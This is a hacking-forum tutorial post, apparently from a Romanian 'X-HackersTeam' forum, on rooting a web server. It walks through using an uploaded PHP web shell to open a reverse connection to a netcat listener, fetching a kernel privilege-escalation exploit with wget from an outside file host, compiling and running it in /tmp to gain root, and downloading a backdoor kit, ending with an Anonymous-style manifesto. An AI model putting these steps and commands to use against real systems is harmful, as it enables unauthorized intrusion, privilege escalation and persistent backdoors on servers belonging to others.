Simpatie.ro - matrimoniale
Ne-am mutat pe xhackers.4umer.com
Ne-am mutat pe xhackers.4umer.com
Nou pe simpatie:
Bianca777
Femeie
24 ani
Brasov
cauta Barbat
27 - 64 ani
Ne-am mutat pe xhackers.4umer.comReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Ne-am mutat pe xhackers.4umer.com / Tutoriale /

Learning how to R00T a website..

Pagini: 1 Moderat de Bloody
#1
ß®£αK£®™
Administrator
Postari: 311
Lets Start...


Things you need

1.A Shell on a Website
2.An Exploit
3.Ssh Backdoor
4.Netcat

Download netcat-->  http://www.downloadnetcat.com/

Exploit i use for kernel 2.6.18--> http://dl.dropbox.com/u/110501025/exploit.c

Shell i use -->
http://dl.dropbox.com/u/110501025/Shell.php


Getting Back Connection to the servers


Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


Getting a Right exploit for the servers


Type : Uname -a & hit enter.
It'll look something like this:


You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-
http://www.Exploit-db.com
http://www.Packetstormsecurity.org


Compiling & executing exploits


Before proceeding further, Cd into the tmp directory, because it is always writable.

So first I'll get the exploit on the server, So I type : Wget "url i gave you or the link to yours :)"
It'll look something Like this:-



now change the permission of the exploit to 777.
Type: "Chmod 777 * exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give you the command---> gcc -o exploit exploit.c
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type-->./exploit

Done :)

Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

type "su" to get full privilages


Installing Backdoors

type--> WGet

http://www.2shared.com/complete/vlFP15eD/mafixtar.html


_______________________________________
We are Anonymous!
We are legion!
Wait for us!
We X-HackersTeam!
We have the power!
We want respect!
X-HackersTeam is Anonymous
EXPECT US !



 
   
Pagini: 1  
Mergi la